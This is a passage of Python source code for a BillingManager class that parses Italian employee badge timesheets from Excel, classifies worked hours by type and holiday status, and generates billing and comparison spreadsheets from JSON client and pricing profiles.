self.pairing_schema = {
"COD QTA": ["COD", "QTA"],
"ENT USC": ["ENT", "USC"],
"GIOR PROG": ["GIOR", "PROG"]
}
self.untouchable_keys = ["id", "tag"]
self.total_content = None
# model configs
self.model_name = "Modello fatturazione.xlsx"
self.footer_color = "e6e6e6"
# config paths
self._clients_path = "../config_files/BusinessCat billing/clients.json"
self._billing_profiles_path = "../config_files/BusinessCat billing/billing_profiles.json"
self._jobs_path = "../config_files/BusinessCat billing/jobs.json"
# load data from config paths
self.__load_clients()
self.__load_billing_profiles()
self.__load_jobs()
# defaults
self.default_new_job = {
"id":"",
"name":"",
"billing_profile_id":""
}
self.default_new_client = {
"id":"",
"name":""
}
self.default_billing_profile = {
"id": "",
"name": "",
"pricelist": [
{
"tag": "OR",
"name": "ore_ordinarie",
"price": 0.0
},
{
"tag": "ST",
"name": "ore_straordinarie",
"price": 0.0
},
{
"tag": "MN",
"name": "ore_notturne",
"price": 0.0
},
{
"tag": "OF",
"name": "ore_festive",
"price": 0.0
},
{
"tag": "SF",
"name": "ore_straordinarie_festive",
"price": 0.0
},
{
"tag": "SN",
"name": "ore_straordinarie_notturne",
"price": 0.0
},
{
"tag": "FN",
"name": "ore_festive_notturne",
"price": 0.0
}
]
}
print(">> BillingManager Initialized")
""" PRIVATE METHODS """
def __get_engine(self):
"""get engine conditional based on extension of self.badges_path"""
if not self.badges_path:
raise Exception("badges_path missing!")
elif self.badges_path.rsplit(".")[-1] == "xlsx":
engine = "openpyxl"
elif self.badges_path.rsplit(".")[-1] == "xls":
engine = "xlrd"
else:
raise TypeError("self.badges_path is not an Excel!")
return engine
def __load_clients(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._clients_path):
init_data = []
with open(self._clients_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new clients.json file")
with open(self._clients_path,"r") as f:
self.clients = json.load(f)
print("** clients caricati")
def __load_billing_profiles(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._billing_profiles_path):
init_data = []
with open(self._billing_profiles_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new billing_profile.json file")
with open(self._billing_profiles_path,"r") as f:
self.billing_profiles = json.load(f)
print("** billing_profiles caricati")
def __load_jobs(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._jobs_path):
init_data = []
with open(self._jobs_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new jobs.json file")
with open(self._jobs_path,"r") as f:
self.jobs = json.load(f)
self.jobs_namelist = sorted([job["name"] for job in self.jobs])
self.jobs_namelist.insert(0,"")
print("** jobs caricati")
def __load_Excel_badges(self):
"""Load excel data of badges file (must be .xls or .xlsx)"""
if not self.badges_path:
raise Exception("ERROR: No badges_path specified")
engine = self.__get_engine()
try:
if engine == "openpyxl":
xlsx_data = openpyxl.load_workbook(self.badges_path)
sheet_names = xlsx_data.sheetnames
elif engine == "xlrd":
xlsx_data = xlrd.open_workbook(self.badges_path, on_demand=True, logfile=open(os.devnull, 'w'))
sheet_names = xlsx_data.sheet_names()
else:
raise
return xlsx_data, sheet_names, engine
except Exception as e:
raise Exception(f"Cannot load_Excel_badges. Error: {e}")
def __manage_columns(self, df):
""" private method to fix original column names"""
fixed_columns = []
prev_fixed = False
for index, v in enumerate(df.columns.values):
if prev_fixed:
prev_fixed = False
continue
new_value = df.columns.values[index].split()
new_value = " ".join(new_value).strip()
if new_value.startswith("COD QTA"):
new_value = new_value.split()
if len(new_value[1]) > 3:
new_value[0] = new_value[0] + new_value[1][3:]
fixed_columns.append(new_value[0])
fixed_columns.append(new_value[1])
prev_fixed = True
else:
fixed_columns.append(new_value)
df.columns = fixed_columns
to_remove = []
for index, col in enumerate(df.columns.values):
if col.startswith("Unnamed"):
# if col not in fixed_columns:
to_remove.append(index)
return df.drop(df.columns[to_remove], axis=1)
def __get_badge_name(self, sheet_obj):
"""get owner's name out of sheet"""
engine = self.__get_engine()
try:
if engine == "openpyxl":
badge_name = (sheet_obj[self.name_cell]).value
elif engine == "xlrd":
badge_name = sheet_obj.cell_value(int(self.name_cell[1:]) - 1, int(openpyxl.utils.cell.column_index_from_string(self.name_cell[0])) - 1)
else:
raise
try:
badge_name = " ".join(badge_name.split())
except:
badge_name = None
return badge_name
except Exception as e:
raise Exception(f"Cannot get_badge_name. Error: {e}")
def __minutes_to_int(self, decimal_time):
""" decimal_time => (str) MM"""
# if 0 not present attach it
if len(decimal_time) == 1:
decimal_time = decimal_time + "0"
hour_min = 60
result = (100 * int(decimal_time)) / hour_min
return str(int(result))
def __round_float(self, float_number, decimal_pos=2):
try:
float(float_number)
except:
raise TypeError("Cannot round: not a float number")
rounded = str(float_number).split(".")
rounded = float(rounded[0] + "." + rounded[1][:decimal_pos])
return rounded
def __smart_renamer(self, name):
old_name = name.split(" ")
new_name = ""
try:
for index, word in enumerate(old_name):
word = word.strip()
if word:
if index < len(old_name):
new_name += (word[0].upper() + word[1:].lower() + " ")
else:
new_name += (word[0].upper() + word[1:].lower())
except:
new_name = name[0].upper() + name[1:].lower()
return new_name
def __gp_column_renamer(self, name):
lookup_table = {
"Ore ORD": "OR",
"Ore STR": "ST",
"Ore NOTT": "MN",
"Ore FEST": "OF",
"Ore STR/FEST": "SF",
"Ore STR/NOTT": "SN",
"Ore FEST/NOTT": "FN"
}
new_name = None
if name in lookup_table:
new_name = lookup_table[name]
if not new_name:
new_name = name
return new_name
def __apply_billing_profile(self, hours_to_bill, billing_profile):
"""
steps: 1. adding time, 2. apply pattern, 3. apply pricing
"""
priced_hours = {}
# check integrity and get tag to focus
if hours_to_bill["OR"] and hours_to_bill["OF"]:
raise ValueError("ERROR: there are both ordinary and holiday hours on a single day")
else:
if hours_to_bill["OF"]:
tag = "OF"
elif hours_to_bill["OR"]:
tag = "OR"
else:
tag = None
# adding time (TIME IS ALWAYS ADDED IN BASE 100 eg. half an hour is not 0.30 but 0.5)
if tag:
if billing_profile["time_to_add"] and hours_to_bill[tag]:
if billing_profile["add_over_threshold"]:
if hours_to_bill[tag] >= billing_profile["threshold_hour"]:
hours_to_bill[tag] += billing_profile["time_to_add"]
else:
hours_to_bill[tag] += billing_profile["time_to_add"]
# apply pattern
if billing_profile["pattern"] and hours_to_bill[tag]:
new_amount = 0.0
start_val = copy.deepcopy(hours_to_bill[tag])
for i in range(len(billing_profile["pattern"])):
operation = billing_profile["pattern"][i]["perform"].strip()
amount = billing_profile["pattern"][i]["amount"]
if operation == "/":
start_val /= amount
elif operation =="-":
start_val -= amount
elif operation == "+":
start_val += amount
elif operation =="*":
start_val *= amount
else:
raise Exception("ERROR: invalid operator in pattern. operator must be one of + - * /")
if billing_profile["pattern"][i]["keep"]:
new_amount += start_val
hours_to_bill[tag] = new_amount
# apply pricing
try:
if billing_profile["pricelist"]:
for hour_type in hours_to_bill:
for p in billing_profile["pricelist"]:
if hour_type == p["tag"]:
priced_hours[hour_type] = hours_to_bill[hour_type]*p["price"]
priced_hours[hour_type] = self.__round_float(priced_hours[hour_type], decimal_pos=2)
else:
raise Exception("ERROR: No pricelist specified!")
except:
print("not found")
return priced_hours
def __get_gp_data(self, gp_xls):
wb = openpyxl.load_workbook(gp_xls)
ws = wb.worksheets[0]
# prendo i nomi di colonna dalla prima riga
columns = list(ws.iter_rows())[0]
columns = [c.value for c in columns]
columns = {k: v for k, v in enumerate(columns) if v}
total_w = []
w_obj = None
for row in list(ws.iter_rows())[1:-1]:
row_content = {k: v.value for k, v in enumerate(row) if k in columns}
if row_content[1] and str(row_content[1]).lower().startswith("somma"): continue
for x in row_content:
if row_content[x] == None:
row_content[x] = 0
if row_content[0]:
if w_obj:
total_w.append(w_obj)
w_obj = {}
for item in columns.items():
w_obj[item[1]] = row_content[item[0]]
else:
for index in row_content:
key = columns[index]
if key != "Nome":
w_obj[key] += row_content[index]
return total_w
""" PROTECTED METHODS """
# must be called once before billing/creating model
def _set_badges_path(self, badges_path):
if not os.path.exists(badges_path):
raise ValueError("ERROR: Cannot find badges path")
self.badges_path = badges_path
print("** badges_path caricato")
# must be called once before billing/creating model
def _set_billing_time(self, month, year):
self.billing_year = int(year)
self.billing_month = int(month)
self._holidays = holidays.IT(years=[self.billing_year, self.billing_year - 1])
def _parse_badges(self, names=[]):
"""
read and fix the badges form, adjusting column names and preparing data to be read by other methods.
returning a dict containing every worker as key and a subdict containing every of its workday as value
"""
xlsx_data, sheet_names, engine = self.__load_Excel_badges()
total_content = {}
not_valid_names = "ENTE: DIV.: GRP/FILIALE: REP:. Cognome Nome Codice"
not_valid_names = not_valid_names.split()
for sheetNo, sheet in enumerate(sheet_names):
sheet_data = xlsx_data[sheet] if engine == "openpyxl" else xlsx_data.get_sheet(sheetNo)
valid_name = False
incremented_by = 0
self.name_cell = "B5"
while not valid_name:
badge_name = self.__get_badge_name(sheet_data)
if badge_name and badge_name.split()[0] not in not_valid_names:
valid_name = True
else:
incremented_by += 1
self.name_cell = f"B{int(self.name_cell[-1]) + 1}"
if names:
if not badge_name in names:
continue
total_content[badge_name] = {}
# getting df, fixing columns, removing empty columns
df = pd.read_excel(xlsx_data, sheet_name=sheet, header=9 + incremented_by, index_col=0, engine=engine)
# set columns
df = self.__manage_columns(df)
# parse rows
for row_ in df.iterrows():
i = str(row_[0]).strip()
row = dict(row_[1])
try:
if re.search(self.regex_day_pattern, i):
row_dict = {}
# pairing values
already_parsed = []
for val in row:
paired = False
for key in self.pairing_schema:
number = ""
if val.split(".")[0] in self.pairing_schema[key]:
in_parsing = list(filter(lambda x: x != "", val.split(".")))
if len(in_parsing) > 1 and in_parsing[1]:
number = f".{in_parsing[1]}"
main_key = key + "." + number if number else key + number
if main_key not in already_parsed:
row_dict[main_key] = []
for v_ in self.pairing_schema[key]:
# find the correct refer_key
for _i in range(3):
refer_key = v_ + "."*_i + number
if refer_key in row.keys():
break
if not isinstance(row[refer_key], pd.Series):
row_dict[main_key].append(str(row[refer_key]).strip())
else:
check_val = ""
for index in list(row[refer_key].to_list()):
if not str(index).isspace():
check_val = str(index).strip()
row_dict[main_key].append(check_val)
already_parsed.append(main_key)
paired = True
if not paired:
row_dict[val] = row[val]
total_content[badge_name][i] = row_dict
except TypeError:
pass
self.total_content = total_content
return total_content
def _parse_days(self, total_content):
""" Pointing out what is the type of the hours worked by the worker that day """
to_return = {}
for worker in total_content:
to_return[worker] = {}
for day in total_content[worker]:
day_content = total_content[worker][day]
parsed_day = {
"OR": 0.0, # ordinarie
"ST": 0.0, # straordinarie
"MN": 0.0, # maggiorazione notturna
"OF": 0.0, # ordinario festivo
"SF": 0.0, # straordinario festivo
"SN": 0.0, # straordinario notturno
"FN": 0.0 # festivo notturno
}
# se non ci sono ore ordinarie o straordinarie return empty day
if not any(day_content["GIOR PROG"]) and not any(day_content["GIOR PROG..1"]):
to_return[worker][day] = parsed_day
continue
# setting starting ordinary and overtime values
if day_content["GIOR PROG"][0]:
val = day_content["GIOR PROG"][0] if len(day_content["GIOR PROG"][0]) >= 4 else "0" + day_content["GIOR PROG"][0]
if "." in val:
val = val.split(".")[0] + "." + self.__minutes_to_int(val.split(".")[1])
parsed_day["OR"] += float(val)
if day_content["GIOR PROG..1"][0]:
val = day_content["GIOR PROG..1"][0] if len(day_content["GIOR PROG..1"][0]) >= 4 else "0" + day_content["GIOR PROG..1"][0]
if "." in val:
val = val.split(".")[0] + "." + self.__minutes_to_int(val.split(".")[1])
parsed_day["ST"] += float(val)
# check every COD key for special hours
for key in day_content:
if key.startswith("COD") and any(day_content[key]):
# night shifts
if day_content[key][0] == "MN":
hours = day_content[key][1] if len(day_content[key][1]) >= 4 else "0" + day_content[key][1]
if "." in hours:
hours = hours.split(".")[0] + "." + self.__minutes_to_int(hours.split(".")[1])
hours = float(hours)
parsed_day["OR"] -= hours
parsed_day["MN"] += hours
# overtime night shifts
elif day_content[key][0] == "SN":
hours = day_content[key][1] if len(day_content[key][1]) >= 4 else "0" + day_content[key][1]
if "." in hours:
hours = hours.split(".")[0] + "." + self.__minutes_to_int(hours.split(".")[1])
hours = float(hours)
parsed_day["ST"] -= hours
parsed_day["SN"] += hours
# if day is holiday decrement ordinary to increase holiday values
try:
check_day = f"{self.billing_month}/{day[:-1]}/{self.billing_year}"
if check_day in self._holidays:
parsed_day["OF"] += parsed_day["OR"]
parsed_day["OR"] -= parsed_day["OR"]
parsed_day["SF"] += parsed_day["ST"]
parsed_day["ST"] -= parsed_day["ST"]
parsed_day["FN"] += parsed_day["MN"]
parsed_day["MN"] -= parsed_day["MN"]
except ValueError as e:
if str(e).startswith("Cannot parse date from string '2/29/"):
raise ValueError(f"ERRORE: {worker} ha lavorato il giorno 29 Febbraio di un anno non bisestile!")
to_return[worker][day] = parsed_day
return to_return
def _new_job_id(self):
id_lenght = 4
check_high = 0
for job in self.jobs:
if int(job["id"]) > check_high:
check_high = int(job["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all jobs
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _new_client_id(self):
id_lenght = 4
check_high = 0
for client in self.clients:
if int(client["id"]) > check_high:
check_high = int(client["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all jobs
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _new_billing_profile_id(self):
id_lenght = 4
check_high = 0
for profile in self.billing_profiles:
if int(profile["id"]) > check_high:
check_high = int(profile["id"])
check_high = str(check_high + 1) # increment 1 from the highest id found among all jobs
new_id = "0"*(id_lenght-len(check_high)) + check_high
return new_id
def _add_job(self):
new_ = copy.deepcopy(self.default_new_job)
new_["id"] = self._new_job_id()
self.jobs.append(new_)
return True
def _rmv_job(self, pos):
if len(self.jobs) > 0:
self.jobs.pop(pos)
return True
def _add_client(self):
new_ = copy.deepcopy(self.default_new_client)
new_["id"] = self._new_client_id()
self.clients.append(new_)
return True
def _rmv_client(self, pos):
if len(self.clients) > 0:
self.clients.pop(pos)
return True
def _add_billing_profile(self):
new_ = copy.deepcopy(self.default_billing_profile)
new_["id"] = self._new_billing_profile_id()
self.billing_profiles.append(new_)
return True
def _rmv_billing_profile(self, pos):
if len(self.billing_profiles) > 0:
self.billing_profiles.pop(pos)
return True
def _create_model(self):
sh_name = "Report Fatturazione"
empty_rows_per_worker = 10
footer_color = PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
error_color = PatternFill(start_color=color_red[1:], end_color=color_red[1:], fill_type="solid")
separator = Border(top=Side(border_style='thin', color="000000"))
combobox_background = PatternFill(start_color="cce6ff", end_color="cce6ff", fill_type="solid")
combobox_border = Border(bottom=Side(border_style='thin', color='e6f3ff'))
combobox_font = openpyxl.styles.Font(bold=True, color="e67300")
COLUMNS_TO_STYLE = ["J", "K", "L"] # style those columns with comboboxes parameters up here
COLUMNS_TO_HIDE = {"first":"B","last":"H"}
# parse data from given excel
total_content = self._parse_badges()
total_content = self._parse_days(total_content)
totals = self.parse_total(total_content)
total_workers_hours = totals[0]
df = pd.DataFrame.from_dict(total_workers_hours).T
# sort alphabetically rows and columns, renaming index
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
# adding "total" row and "total" column
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
user_columns = [
"cliente",
"profilo",
"mansione",
"ore_ordinarie",
"ore_straordinarie",
"ore_notturne",
"ore_festive",
"ore_straordinarie_festive",
"ore_straordinarie_notturne",
"ore_festive_notturne",
"totale"
]
df_utente = pd.DataFrame(columns=user_columns)
df = pd.concat([df,df_utente], axis=1)
df.fillna("", inplace=True)
df.index.rename("LAVORATORI", inplace=True)
############### GENERATING EXCEL MODEL
with pd.ExcelWriter(self.model_name, mode="w") as writer:
# create client, billing_profile, job lookup in a different sheet
check_sheet = "check_sheet"
check_ws = writer.book.create_sheet(check_sheet)
check_ws.title = check_sheet
vals_ = {
"clients": [f"{x['id']} {x['name']}" for x in self.clients],
"billing_profiles": [f"{x['id']} {x['name']}" for x in self.billing_profiles],
"jobs": [f"{x['id']} {x['name']}" for x in self.jobs]
}
col_ = 1
for key in vals_:
row_ = 1
for entry in vals_[key]:
check_ws[f"{get_column_letter(col_)}{row_}"].value = entry
row_ += 1
col_ += 1
# calculate check columns lenght
check_sheet_columns = {
"J":f'={check_sheet}!$A$1:$A$',
"K":f'={check_sheet}!$B$1:$B$',
"L":f'={check_sheet}!$C$1:$C$'
}
for i_, column in enumerate(check_ws.iter_cols(max_col=check_ws.max_column, max_row=check_ws.max_row)):
referral = list(check_sheet_columns.keys())[i_]
i_ += 1
column_lenght = 0
for cell in column:
if not cell.value:
break
column_lenght += 1
if not column_lenght:
column_lenght += 1
check_sheet_columns[referral] += str(column_lenght)
# hide check_sheet
check_ws.sheet_state = "hidden"
######################################################################################## MAIN BILL
df.to_excel(writer, sheet_name=sh_name, na_rep=0, float_format="%.2f")
ws = writer.sheets[sh_name]
# style last rows
last_rows_to_style = 1
added_rows = 1 # fixed, don't touch
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df) + 1 + added_rows) - row}:{(len(df) + 1 + added_rows) - row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
# adding blank rows
ws = writer.sheets[sh_name]
refer_ws = copy.deepcopy(ws)
check_name = None
for row in refer_ws.iter_rows(max_row=ws.max_row):
refer_name = row[0].value
if refer_name and refer_name.upper() != refer_name and refer_name != check_name:
for index, row_ in enumerate(ws.iter_rows()):
if row_[0].value == refer_name:
ws.insert_rows(index+2, empty_rows_per_worker)
check_name = refer_name
break
# set color, font weight, alignment of total column
for cell in ws[f"I1:I{ws.max_row}"]:
cell[0].font = openpyxl.styles.Font(bold=True)
cell[0].fill = footer_color
cell[0].alignment = Alignment(horizontal="center")
cell[0].number_format = '#,##0.00'
# adding formulas
for index, row in enumerate(ws.iter_rows()):
if index != 0 and index != 1 and index != ws.max_row:
row_total_formula = f"=SUM(M{index}:S{index})"
ws[f"T{index}"] = row_total_formula
ws[f"T{index}"].number_format = '#,##0.00'
if row[0].value and row[0].value.upper() != row[0].value:
wtfi = index + (empty_rows_per_worker+1) # worker total formula index
worker_total_formula = f"=SUM(T{index+1}:T{wtfi})-I{index+1}"
ws[f"U{wtfi}"] = worker_total_formula
ws[f"U{wtfi}"].number_format = '#,##0.00'
# adjust column width
for index, row in enumerate(ws.iter_cols()):
index +=1
if index == 1:
ws.column_dimensions[get_column_letter(index)].width = 20
elif index >=2 and index <=9:
ws.column_dimensions[get_column_letter(index)].width= 8
elif index >= 10 and index <= 12:
ws.column_dimensions[get_column_letter(index)].width = 25
else:
ws.column_dimensions[get_column_letter(index)].width = 15
# adding comboboxes
for col in COLUMNS_TO_STYLE:
try:
dv = DataValidation(type="list", formula1=check_sheet_columns[col], allowBlank=True)
ws.add_data_validation(dv)
dv.add(f"{col}2:{col}{ws.max_row - 1}")
except KeyError:
raise KeyError(f"ERRORE: nessuna lista di controllo per le celle della colonna {col}")
for cell in ws[f"{col}2:{col}{ws.max_row-1}"]:
cell[0].font = combobox_font
cell[0].fill = combobox_background
cell[0].alignment = Alignment(horizontal="left")
cell[0].border = combobox_border
# set border between workers
for row in ws.iter_rows(max_row=ws.max_row):
if row[0].value and row[0].value.upper() != row[0].value:
for cell in row:
# if already styled keep bottom style
if cell.border.bottom.color is not None or cell.border.bottom.style is not None:
temp_ = copy.deepcopy(separator)
temp_.bottom.color = cell.border.bottom.color
temp_.bottom.style = cell.border.bottom.style
cell.border = temp_
continue
cell.border = separator
# hide columns
ws.column_dimensions.group(COLUMNS_TO_HIDE["first"], COLUMNS_TO_HIDE["last"], outline_level=1, hidden=True)
# freeze first column and row
ws.freeze_panes = ws["B2"]
# add conditional formatting
ws.conditional_formatting.add(f'U2:U{ws.max_row}', formatting.rule.CellIsRule(operator='notEqual', formula=[0], fill=error_color))
def _create_comparison(self, gp_filepath):
sh_name = "Comparazione"
footer_color = PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
error_color = PatternFill(start_color=color_red[1:], end_color=color_red[1:], fill_type="solid")
separator = Border(top=Side(border_style='thin', color="000000"))
# parse data from given excel
total_content = self._parse_badges()
total_content = self._parse_days(total_content)
totals = self.parse_total(total_content)
total_workers_hours = totals[0]
# get cartellini df
df = pd.DataFrame.from_dict(total_workers_hours).T
df.index.rename("LAVORATORI", inplace=True)
df = df.sort_index()
df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
df['TOTALI'] = df.sum(axis=1, numeric_only=True)
# get gp_df
gp_data = self.__get_gp_data(gp_filepath)
gp_df = pd.DataFrame.from_records(gp_data, index="Nome")
gp_df = gp_df.sort_index()
gp_df.rename(index=lambda x: self.__smart_renamer(x), inplace=True)
gp_df.rename(columns=lambda x: self.__gp_column_renamer(x), inplace=True)
gp_df['TOTALI'] = gp_df.sum(axis=1, numeric_only=True)
gp_df.index.rename("LAVORATORI", inplace=True)
# merge them
df = pd.concat([df, gp_df], axis=1)
df.index.rename("LAVORATORI", inplace=True)
df.fillna(0, inplace=True)
# adding "total" row
df.loc[">> ORE TOTALI <<"] = df.astype(float).sum(axis=0, numeric_only=True)
df = df.replace(0, "")
############### GENERATING EXCEL MODEL
with pd.ExcelWriter("Comparazione.xlsx", mode="w") as writer:
df.to_excel(writer, sheet_name=sh_name, na_rep=0, float_format="%.2f")
ws = writer.sheets[sh_name]
# style last rows
last_rows_to_style = 1
added_rows = 1 # fixed, don't touch
for row in range(last_rows_to_style, 0, -1):
for cell in ws[f"{(len(df) + 1 + added_rows) - row}:{(len(df) + 1 + added_rows) - row}"]:
cell.font = openpyxl.styles.Font(bold=True)
cell.fill = footer_color
# set color, font weight, alignment of totals column
totals_columns = ["I", "R"]
for col_ in totals_columns:
for cell in ws[f"{col_}1:{col_}{ws.max_row}"]:
cell[0].font = openpyxl.styles.Font(bold=True)
cell[0].fill = footer_color
cell[0].alignment = Alignment(horizontal="center")
cell[0].number_format = '#,##0.00'
# adding formulas
for index, row in enumerate(ws.iter_rows()):
if index != 0 and index != 1 and index != ws.max_row:
row_total_formula = f"=SUM(J{index}:Q{index})"
ws[f"R{index}"] = row_total_formula
ws[f"R{index}"].number_format = '#,##0.00'
try:
if row[0].value and row[0].value.upper() != row[0].value:
worker_total_formula = f"=I{index}-R{index}"
ws[f"S{index}"] = worker_total_formula
ws[f"S{index}"].number_format = '#,##0.00'
except AttributeError:
pass
# adjust column width
for index, row in enumerate(ws.iter_cols()):
index +=1
if index == 1:
ws.column_dimensions[get_column_letter(index)].width = 30
elif (index >=2 and index <=8) or (index >=10 and index <=17):
ws.column_dimensions[get_column_letter(index)].width= 10
else:
ws.column_dimensions[get_column_letter(index)].width = 15
# set border between workers
for row in ws.iter_rows(max_row=ws.max_row):
try:
if row[0].value and row[0].value.upper() != row[0].value:
for cell in row:
# if already styled keep bottom style
if cell.border.bottom.color is not None or cell.border.bottom.style is not None:
temp_ = copy.deepcopy(separator)
temp_.bottom.color = cell.border.bottom.color
temp_.bottom.style = cell.border.bottom.style
cell.border = temp_
continue
cell.border = separator
except AttributeError:
pass
# freeze first column and row
ws.freeze_panes = ws["B2"]
# add conditional formatting
ws["S1"].value = "DIFFERENZA"
ws["S1"].font = openpyxl.styles.Font(bold=True)
ws["S1"].alignment = Alignment(horizontal='center')
ws.conditional_formatting.add(f'S2:S{ws.max_row}', formatting.rule.CellIsRule(operator='notEqual', formula=[0], fill=error_color))
def _bill(self, model_path, profile_to_bill):
BILLING_MODEL = openpyxl.load_workbook(model_path) # file to scan
bpi = profile_to_bill # "<id> <name>"
profile_obj = self.get_billing_profile_obj(bpi.split()[0]) # full_profile object
pricelist = profile_obj["pricelist"]
### styles
rows_between_jobs = 4
job_font = openpyxl.styles.Font(bold=True, size=24)
job_border = Border(bottom=Side(border_style='thick', color='3385ff'))
header_font = openpyxl.styles.Font(bold=True)
footer_color = openpyxl.styles.PatternFill(start_color=self.footer_color, end_color=self.footer_color, fill_type="solid")
try:
bill_name = f"Fattura {bpi.split()[1:]} {self.billing_month}-{self.billing_year}.xlsx"
except:
bill_name = self.bill_name
job_schema = ["client_id", "billing_profile_id", "job_id"]
HOURS_TYPE = ["OR", "ST", "MN", "OF", "SF", "SN", "FN"]
try:
ws = BILLING_MODEL["Report Fatturazione"]
except:
raise Exception("Non ho trovato il foglio 'Report Fatturazione' nel file excel!")
# GROUP BY JOB
grouped_by_job = {}
active_name = None
for row in ws.iter_rows(max_row=ws.max_row, max_col=ws.max_column):
name = row[0].value
if name:
if name.upper() == name:
continue
active_name = name
if not name:
name = active_name
to_parse = [cell.value for cell in row[9:-2]] # get info from column J to column S
job_info = to_parse[0:3] # cliente, profilo, mansione
hours_info = to_parse[3:] # OR, ST, MN, OF, SF, SN, FN
job_info = dict(zip(job_schema, job_info))
hours_info = dict(zip(HOURS_TYPE, hours_info))
if job_info["billing_profile_id"] == bpi:
if job_info["job_id"] not in grouped_by_job:
grouped_by_job[job_info["job_id"]] = {}
if name not in grouped_by_job[job_info["job_id"]]:
grouped_by_job[job_info["job_id"]][name] = hours_info
# check if model contains workers for the given billing profile
if not grouped_by_job:
raise Exception("Il modello fornito non contiene lavoratori che abbiano svolto una mansione sotto quel profilo")
# WRITE BILL
title_ = bpi.split(" ", 1)[1]
wb = openpyxl.Workbook()
wb.remove_sheet(wb.get_sheet_by_name("Sheet")) # remove default sheet
wb.create_sheet(title_)
wb.save(bill_name)
row_ = 1
for job_ in grouped_by_job:
header_row = None
ws = wb[title_]
# get job df
df = pd.DataFrame.from_dict(grouped_by_job[job_]).T
df = df.reindex(HOURS_TYPE, axis=1)
df.sort_index(inplace=True)
df.index.rename("LAVORATORI", inplace=True)
df.loc[">> ORE TOTALI <<"] = df.sum(axis=0, numeric_only=True)
df['TOTALE'] = df.sum(axis=1, numeric_only=True)
df.fillna(0.0, inplace=True)
# write job name
ws[f"A{row_}"].value = job_.split(" ", 1)[1]
ws[f"A{row_}"].font = job_font
for c_ in range(1,10):
ws[f"{get_column_letter(c_)}{row_}"].border = job_border
row_ += 1
# save for reference
header_row = row_
# write headers
col_ = 1
ws[f"{get_column_letter(col_)}{header_row}"].value = df.index.name
ws[f"{get_column_letter(col_)}{header_row}"].font = header_font
col_ += 1
for colname in df.columns.values:
ws[f"{get_column_letter(col_)}{header_row}"].value = colname.upper()
ws[f"{get_column_letter(col_)}{header_row}"].font = header_font
col_ += 1
row_ += 1
# get lookup from headers
lookup = {}
for r in ws.iter_rows(min_row=header_row, max_row=header_row, max_col=ws.max_column):
lookup = dict(zip([val.value for index, val in enumerate(r)],[index for index, val in enumerate(r)]))
break
# write workers and totals
for row in df.iterrows():
col_ = 1
worker = row[0]
w_hours = dict(row[1])
# per ogni intestazione inserisco il suo valore del lavoratore
for h_type in lookup:
val_to_write = None
if h_type == "LAVORATORI":
val_to_write = worker
elif h_type == "TOTALE":
val_to_write = f"=SUM(B{row_}:H{row_})"
else:
try:
val_to_write = w_hours[h_type]
except KeyError:
print(f"key {w_hours[h_type]} not found!")
ws[f"{get_column_letter(col_)}{row_}"].value = val_to_write
# check style last row
if worker == ">> ORE TOTALI <<":
ws[f"{get_column_letter(col_)}{row_}"].fill = footer_color
ws[f"{get_column_letter(col_)}{row_}"].font = header_font
if col_ < ws.max_column:
col_ += 1
# if last row calculate billing hours for current job
if worker == ">> ORE TOTALI <<":
billed_hours = dict(zip(lookup.keys(), [0.0 for entry in range(len(lookup.keys()))]))
for r in ws.iter_rows(min_row=row_, max_row=row_, max_col=ws.max_column): #header_row+1
for h_type in lookup:
if h_type == "LAVORATORI":
billed_hours[h_type] = ">> IMPONIBILE <<"
elif h_type == "TOTALE":
billed_hours[h_type] = f"=SUM(B{row_+1}:H{row_+1})"
else:
colNo = lookup[h_type]
to_sum = r[colNo].value
billed_hours[h_type] += to_sum
# move down a line
row_ += 1
# write billed hour row
for h_type in billed_hours:
colNo = lookup[h_type]
colNo += 1
if h_type in ["LAVORATORI", "TOTALE"]:
val_to_write = billed_hours[h_type]
else:
try:
price = None
# find price in pricelist
for p_ in pricelist:
if p_["tag"] == h_type:
price = float(p_["price"])
break
if not price:
raise
# (formula) multiply h_type total for its price
val_to_write = f"={get_column_letter(lookup[h_type]+1)}{row_-1}*{price}"
except:
raise Exception(f"ERRORE: valori imponibili non calcolabili")
# style cell
ws[f"{get_column_letter(colNo)}{row_}"].value = val_to_write
ws[f"{get_column_letter(colNo)}{row_}"].font = header_font
ws[f"{get_column_letter(colNo)}{row_}"].fill = footer_color
ws[f"{get_column_letter(colNo)}{row_}"].number_format = '#,##0.00€'
row_ += rows_between_jobs
else:
row_ += 1
# adjust columns width
for c_ in range(1,10):
# first column
if c_ == 1:
ws.column_dimensions[get_column_letter(c_)].width = 40
# next columns
else:
ws.column_dimensions[get_column_letter(c_)].width = 15
wb.save(bill_name)
return bill_name
""" PUBLIC METHODS """
def get_all_badges_names(self):
""" return an array of all names found in excel file """
xlsx_data, sheet_names, engine = self.__load_Excel_badges()
names = []
for sheetNo, sheet in enumerate(sheet_names):
sheet_data = xlsx_data[sheet] if engine == "openpyxl" else xlsx_data.get_sheet(sheetNo)
names.append(self.__get_badge_name(sheet_data))
return names
def get_jobname(self, job_id):
""" given id, gets job name """
name = ""
for job in self.jobs:
if job["id"] == job_id:
name = job["name"]
break
if not name and job_id:
name = f"Job {job_id} non trovato"
return name
def get_client_object(self, client_id):
client = None
for c in self.clients:
if c["id"] == client_id:
client = c
break
return client
def get_billing_profile_obj(self, billing_profile_id):
billing_profile = None
for profile in self.billing_profiles:
if profile["id"] == billing_profile_id:
billing_profile = profile
break
return billing_profile
